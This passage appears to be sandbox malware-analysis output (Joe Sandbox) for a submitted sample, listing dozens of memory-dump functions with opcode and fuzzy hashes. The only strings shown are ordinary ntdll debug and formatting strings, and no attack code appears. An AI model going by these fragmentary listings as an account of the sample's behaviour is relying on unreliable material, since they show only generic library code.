                                                • Opcode ID: 7d7382d76c998733145c3b79eb30973574a632dd35c0f23eda8a33a3adf1fbc5
                                                • Instruction ID: 2eb8794b80583fc5884393ab6ed9d572b84e33000c27e0c07a18d8588c00eb5b
                                                • Opcode Fuzzy Hash: 7d7382d76c998733145c3b79eb30973574a632dd35c0f23eda8a33a3adf1fbc5
                                                • Instruction Fuzzy Hash: 15900229221410020149B558070450B0455A7D6351395C015F1417590CC72189655322
                                                Function 011C2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 97911bf86652549e46ec96989c9b7005249d4d23e8cd160158d935d7ae728fef
                                                • Instruction ID: aa68bacc4854520314330f8e62e8d938e9122a412f8d2dd0467f409d31b3925e
                                                • Opcode Fuzzy Hash: 97911bf86652549e46ec96989c9b7005249d4d23e8cd160158d935d7ae728fef
                                                • Instruction Fuzzy Hash: 8890022D21341002D1847158550860A001597D1202F95D415E0016558CCA1589695322
                                                Function 011C2D00 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9b6dde56a060ac9fea3a06ddf44cfff5f622bd1018cd408313c180482d78eab
                                                • Instruction ID: 7e3644682c3659c788aeed22355556ebbd1a622743fe86bbb9b192400d2e825f
                                                • Opcode Fuzzy Hash: a9b6dde56a060ac9fea3a06ddf44cfff5f622bd1018cd408313c180482d78eab
                                                • Instruction Fuzzy Hash: 0A90043530545443D104755C550CF070015D7D0305F55D011F10755D5DC735CD51F333
                                                Function 011C2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a38263e83f830b55de8b518b65ca9a7bdc9c276d545de65a7c6e54b5dc7f9ee8
                                                • Instruction ID: 660fe21e046f7f6dc9d23d3915c77548074bc554fa03d134a0c16914ea66d619
                                                • Opcode Fuzzy Hash: a38263e83f830b55de8b518b65ca9a7bdc9c276d545de65a7c6e54b5dc7f9ee8
                                                • Instruction Fuzzy Hash: D490043530141003D144715C551C7074015F7F1301F55D011F0415554CDF15CD575333
                                                Function 011C2DB0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ccda70bc9b9850f11086bd20fd0850e9353e0bc72c06d1e04b6d6aae58adbb2c
                                                • Instruction ID: fadc92bb3021d9bbca084d19e2109959eddb08b0c2fe4b86110a800a736a7fa3
                                                • Opcode Fuzzy Hash: ccda70bc9b9850f11086bd20fd0850e9353e0bc72c06d1e04b6d6aae58adbb2c
                                                • Instruction Fuzzy Hash: 6490023524141402D145715845046060019A7D0241F95C012E0425554EC7558B56AB62
                                                Function 011C2DD0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cce4a796ab2e5ec574d2c795c5700590b9945743e26328a554bbb862592a8512
                                                • Instruction ID: 20add75c0dedb3ce24b16a7abf4a20a8391eb82cf9290fd65f54378752c122c8
                                                • Opcode Fuzzy Hash: cce4a796ab2e5ec574d2c795c5700590b9945743e26328a554bbb862592a8512
                                                • Instruction Fuzzy Hash: A8900225242451525549B15845045074016A7E0241795C012E1415950CC6269956D722
                                                Function 011C2C60 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b05aa55bd0246b3154ed946c5a300bbaf4862f772bd53b65cbda4eb7d321c4dd
                                                • Instruction ID: 548c3a9acd3d5d5d443856919a81bb5a888792b9419fed9a5bb210b3b05cbdbb
                                                • Opcode Fuzzy Hash: b05aa55bd0246b3154ed946c5a300bbaf4862f772bd53b65cbda4eb7d321c4dd
                                                • Instruction Fuzzy Hash: F790043530141C43D104715C4504F470015D7F0301F55C017F0135754DC715CD517733
                                                Function 011C2CA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb8a8a8ecbf3a29ff528cc15648b8b5af8bc8cafc0e666d959bb7a8860130627
                                                • Instruction ID: 01faf2dba69775586f691e0081443c213457b03b897bec3474494b7c76ea5f66
                                                • Opcode Fuzzy Hash: fb8a8a8ecbf3a29ff528cc15648b8b5af8bc8cafc0e666d959bb7a8860130627
                                                • Instruction Fuzzy Hash: AD90023520141402D10475985508646001597E0301F55D011E5025555EC76589916232
                                                Function 011C2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b3b847dcb8553b51a0ca40098544b8a348deaf6e14176ae3a9edc2597b43ba2d
                                                • Instruction ID: 1d446cc1e0eff599afd89ab4cf2ea9a2c9a1f655307f3ca0db1f08217babc273
                                                • Opcode Fuzzy Hash: b3b847dcb8553b51a0ca40098544b8a348deaf6e14176ae3a9edc2597b43ba2d
                                                • Instruction Fuzzy Hash: 7590043570541403D144715C551C7070035D7D0301F55D011F0035554DC75DCF5577F3
                                                Function 011C2CF0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 16508e8bdec4ca355c8e71780a0df2ea8a895606d2c8bc082c1fbeb263795f51
                                                • Instruction ID: 73b768a3b4c03b623af13327043634f0f295232cf55cc9d10ef1019fb32147dc
                                                • Opcode Fuzzy Hash: 16508e8bdec4ca355c8e71780a0df2ea8a895606d2c8bc082c1fbeb263795f51
                                                • Instruction Fuzzy Hash: 8990043530141403D104715C570C7070015D7D0301F55D411F043555CDD757CD517333
                                                Function 011C2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ea6dfe02bbe74c57e28495183ec7002595df0bf5cac11a561c8b0db17dd0cb0e
                                                • Instruction ID: fbc9c1f53ff1993516a4a1ae04facd2918ff8b50f7d8b6d16bb9cf5bad1c43a9
                                                • Opcode Fuzzy Hash: ea6dfe02bbe74c57e28495183ec7002595df0bf5cac11a561c8b0db17dd0cb0e
                                                • Instruction Fuzzy Hash: 5490047534141443D104715C4514F070015D7F1301F55C015F1075554DC71DCD537337
                                                Function 011C2F60 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6fff108ad1cc319832c8adcef6e840e94bd46426b39f69141a7db7ec150c5e1a
                                                • Instruction ID: c2ae13ec10f82117bc340bdd0af1c789f4d18b21b929023628a73d11801df808
                                                • Opcode Fuzzy Hash: 6fff108ad1cc319832c8adcef6e840e94bd46426b39f69141a7db7ec150c5e1a
                                                • Instruction Fuzzy Hash: 1190047531141043D10C715C45047070055D7F1301F55C013F3155554CC73DCD715337
                                                Function 011C2F90 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12ba2fd4d5b16e3d69dacde6626c531f91c8d9a50cad1c1ec283fd6f0efb82e6
                                                • Instruction ID: a094101521160465ef6c0c32cb75060c1d43bf869ddcae38c4f5706df67f1457
                                                • Opcode Fuzzy Hash: 12ba2fd4d5b16e3d69dacde6626c531f91c8d9a50cad1c1ec283fd6f0efb82e6
                                                • Instruction Fuzzy Hash: 36900435301C1403D104715C4D1470F0015D7D0303F55C011F1175555DC735CD517773
                                                Function 011C2FB0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d266174794cd167459d68d8a8014bf1afcbea2354f1a6fb38d4f9de7eef8cf4d
                                                • Instruction ID: fdd14d9fe6594065b240d6f9cc0d2662f6eb9b44c43254d45886c9b233af838a
                                                • Opcode Fuzzy Hash: d266174794cd167459d68d8a8014bf1afcbea2354f1a6fb38d4f9de7eef8cf4d
                                                • Instruction Fuzzy Hash: 50900225601410424144716889449064015BBE1211755C121E0999550DC65989655766
                                                Function 011C2FA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43352d59d462a3a7cb4366a31fb4e8b2b6e55e2f60afc1459e92890d3fb069dd
                                                • Instruction ID: d8aa717e2d926e52fe640daefae7341d57deb02b0458d934e06a0f39e246aec9
                                                • Opcode Fuzzy Hash: 43352d59d462a3a7cb4366a31fb4e8b2b6e55e2f60afc1459e92890d3fb069dd
                                                • Instruction Fuzzy Hash: FF90023520181402D10471584908747001597D0302F55C011E5165555EC765C9916632
                                                Function 011C2FE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cb9d6fee9a5037a0819eeec524b824bcf9d87e16631c0b0e74c0af549e8d68c1
                                                • Instruction ID: 8e9511a4480ca6875ac8a8d501e615d84110705e92635337489473cad477fe27
                                                • Opcode Fuzzy Hash: cb9d6fee9a5037a0819eeec524b824bcf9d87e16631c0b0e74c0af549e8d68c1
                                                • Instruction Fuzzy Hash: 9F900225211C1042D20475684D14B07001597D0303F55C115E0155554CCA1589615622
                                                Function 011C2E30 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c16a259b5507832d746b5abb34e01aba59367ad42b07fa6b868ffdc379a6234
                                                • Instruction ID: db19ff05ecca9f4e0243c14d4cf6b9d5bf3ed311d110ee75f629bd36535b7433
                                                • Opcode Fuzzy Hash: 9c16a259b5507832d746b5abb34e01aba59367ad42b07fa6b868ffdc379a6234
                                                • Instruction Fuzzy Hash: 4390022530141402D106715845146060019D7D1345F95C012E1425555DC7258A53A233
                                                Function 011C2E80 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b06ac1765d63d900840d8716866a092bdf3960384e665c377355681771c2c7d
                                                • Instruction ID: f0780229645441a97bce7bdc9690725d92ec76667d63c42cd9b8a46ee411b633
                                                • Opcode Fuzzy Hash: 2b06ac1765d63d900840d8716866a092bdf3960384e665c377355681771c2c7d
                                                • Instruction Fuzzy Hash: 6C90022560141502D10571584504616001A97D0241F95C022E1025555ECB258A92A232
                                                Function 011C2EA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 323bac5bf558bddd9392d0479da572adeee7e556daebebe8248ad39427bd54b1
                                                • Instruction ID: 032d6e2ca38e5617af15e95b08155fa38eef7bcbe7e6c03c12b311794a30b891
                                                • Opcode Fuzzy Hash: 323bac5bf558bddd9392d0479da572adeee7e556daebebe8248ad39427bd54b1
                                                • Instruction Fuzzy Hash: 6190047530141403D144715C45047470015D7D0301F55C011F5075554FC75DCFD57777
                                                Function 011C2EE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7187245e8c0f558cef8e482d379e714a9aef57ef9ab433178f88161db8a46890
                                                • Instruction ID: 9940581e97fd847cc0ed2ebbb24305afd6386be4a3a0a295363154460ccd7293
                                                • Opcode Fuzzy Hash: 7187245e8c0f558cef8e482d379e714a9aef57ef9ab433178f88161db8a46890
                                                • Instruction Fuzzy Hash: A790026520181403D14475584904607001597D0302F55C011E2065555ECB298D516236
                                                Function 011C3010 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e9f8cc82dbf0efbf691f5e033580f0fe3cb39431088545d19b5560c8c31db96
                                                • Instruction ID: 1b7b9813fbbdc18c88761979190edde1d944bb53257e3371c2ac896b6d60f9e6
                                                • Opcode Fuzzy Hash: 2e9f8cc82dbf0efbf691f5e033580f0fe3cb39431088545d19b5560c8c31db96
                                                • Instruction Fuzzy Hash: 7390022520185442D14472584904B0F411597E1202F95C019E4157554CCA1589555722
                                                Function 011C3090 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6560ecfbad82887250e814766aefd24534171d3aa740682cded4691952fa302d
                                                • Instruction ID: bd1099dd4435e66a2bef9a4ada460972d153ea4689f3cecd4699aef5bb619023
                                                • Opcode Fuzzy Hash: 6560ecfbad82887250e814766aefd24534171d3aa740682cded4691952fa302d
                                                • Instruction Fuzzy Hash: DD90022524141802D144715885147070016D7D0601F55C011E0025554DC7168A6567B2
                                                Function 011C39B0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f6424d39d4392a68220fc6af12ca7e5806cd5f6bd8f8b809c275f8e0fd2afcdf
                                                • Instruction ID: ecc817c627578f221261662e3fa6203cd068ff23c91c73d84d64de36973240b3
                                                • Opcode Fuzzy Hash: f6424d39d4392a68220fc6af12ca7e5806cd5f6bd8f8b809c275f8e0fd2afcdf
                                                • Instruction Fuzzy Hash: 7290043534547103D154715C45047174015F7F0301F55C031F0C155D4DC755CD557333
                                                Function 011C3D10 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8c3a5f0306769cbdc1c22f0ed0845af2324757a1c3c998fb01634019bb3b47c7
                                                • Instruction ID: edd5042e6fb6371ebcfe42e05c16972df5c8722b9774e8386485b62c19d87b68
                                                • Opcode Fuzzy Hash: 8c3a5f0306769cbdc1c22f0ed0845af2324757a1c3c998fb01634019bb3b47c7
                                                • Instruction Fuzzy Hash: 7F90023520241142954472585904A4E411597E1302B95D415E0016554CCA1489615322
                                                Function 011C3D70 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cd2b6c88719ec287d9975dfefc02c72eda24b60758746ac36cc315085171d2d8
                                                • Instruction ID: 6f73ef49ce9d53d01c67d3e4f58e21328f58e6c142e06d3458fd1e2416deaf46
                                                • Opcode Fuzzy Hash: cd2b6c88719ec287d9975dfefc02c72eda24b60758746ac36cc315085171d2d8
                                                • Instruction Fuzzy Hash: B990023920141402D51471585904646005697D0301F55D411E0425558DC75489A1A222
                                                Function 011C2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: f50c2a332d6ecf4a94890fbdc1e7e8f755e852d62214f9b67cbc070c094e8110
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                Function 011C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: c928e2873c7a2ed13ca5cd9e69a7e2b10c8cb5b25def5355a3dbe0bd126fd025
                                                • Instruction ID: a369943c0c5a74da8e2e1fefda9b861909551b2629d43a39712f10650fcaf4e0
                                                • Opcode Fuzzy Hash: c928e2873c7a2ed13ca5cd9e69a7e2b10c8cb5b25def5355a3dbe0bd126fd025
                                                • Instruction Fuzzy Hash: 1751E7B5A00126BFDB19DB9C889097EFBF8BF18640B14C12DF569D7641E374DE4087A0
                                                Function 01232410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 46c026aafeca55f9c61a0d7a3ff64980f567a991c31b74778e6d7782a5d053f1
                                                • Instruction ID: cbe1893ea627eeb02f4676228a87ee45f8a1df044b36a49739005667009088cf
                                                • Opcode Fuzzy Hash: 46c026aafeca55f9c61a0d7a3ff64980f567a991c31b74778e6d7782a5d053f1
                                                • Instruction Fuzzy Hash: BD5119B1A10646EECB38DF5CC89097FB7F8EF88200B448559E6D6D7681D7B4EA40C760
                                                Function 011B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011F46FC
                                                • Execute=1, xrefs: 011F4713
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 011F4655
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 011F4787
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 011F4725
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 011F4742
                                                • ExecuteOptions, xrefs: 011F46A0
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: adc28a5336ab2bb357234ed6d85dc1152cf60d02030d1956bbf63129a4f831fc
                                                • Instruction ID: e98d55b95007f403fbe6ef2e5358a47b5e0079b0a13655b731bcf580d99a8546
                                                • Opcode Fuzzy Hash: adc28a5336ab2bb357234ed6d85dc1152cf60d02030d1956bbf63129a4f831fc
                                                • Instruction Fuzzy Hash: 51513931A002197AEF2DABA8ECD9FFE77A8AF98704F04019DD605A71C1E7719A418F51
                                                Function 011CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction ID: 802d2273c66ed54bf74238e9f6b9068f91ebff6420fdc5118e43c5edf3778748
                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction Fuzzy Hash: D081A070E092599EEF2D8EACC8527FEBBB1AF65BA0F18411DD851E72D1C7348840CB59
                                                Function 012320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: 094a33a492c6c47f4dc24acc6ffdf382112ff50819ecea5403f4d65cea6a2988
                                                • Instruction ID: 711b3bcae142224257ff337682654c744e877b20df3cb5642e44ba5be12cc516
                                                • Opcode Fuzzy Hash: 094a33a492c6c47f4dc24acc6ffdf382112ff50819ecea5403f4d65cea6a2988
                                                • Instruction Fuzzy Hash: C52167B6A1011AABDB14DF79DD44AEEBBF8EF94644F040119EA45E3201E731DA018BE1
                                                Function 011AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 011F031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011F02BD
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011F02E7
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 42f2ac342969890b2b4bc607886b77f1c831c47e9a1b9ea8f317dc04004a5ca7
                                                • Instruction ID: 00fa435888f7e959e83dee6f8eae194e1a83379cb4cceb3159fe4267e7967a6b
                                                • Opcode Fuzzy Hash: 42f2ac342969890b2b4bc607886b77f1c831c47e9a1b9ea8f317dc04004a5ca7
